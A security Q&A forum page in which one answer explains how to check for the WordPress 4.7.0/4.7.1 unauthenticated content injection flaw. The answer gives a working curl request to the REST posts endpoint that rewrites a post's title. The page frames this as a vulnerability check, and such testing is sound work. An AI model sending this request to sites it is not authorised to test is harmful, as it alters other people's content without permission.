Techbypass always tries to help you to learn about recent vulnerabilities and exploitations.

Question

How can I check WordPress 4.7.0/4.7.1 - Content Injection vulnerability?

1 Answer

codeshikari · Answer 1 · 2019-05-09T19:42:58+0000

Through this vulnerability, an unauthenticated user can modify the content of any post or page. Lets the post id is 1 and you can change the title using this Curl command.

curl 'https://www.example.com/blog/wp-json/wp/v2/posts/1' -X 'POST' -F 'id=1changecontent' -F 'title=Codeshikari'

If your site is vulnerable then the title of the post id 1 will change to "Codeshikari".

Techbypass always tries to help you to learn about recent vulnerabilities and exploitations.

Learn and share your security findings and help others to secure their digital assets.

How can I check WordPress 4.7.0/4.7.1 - Content Injection vulnerability?

Please log in or register to answer this question.

1 Answer

Please log in or register to add a comment.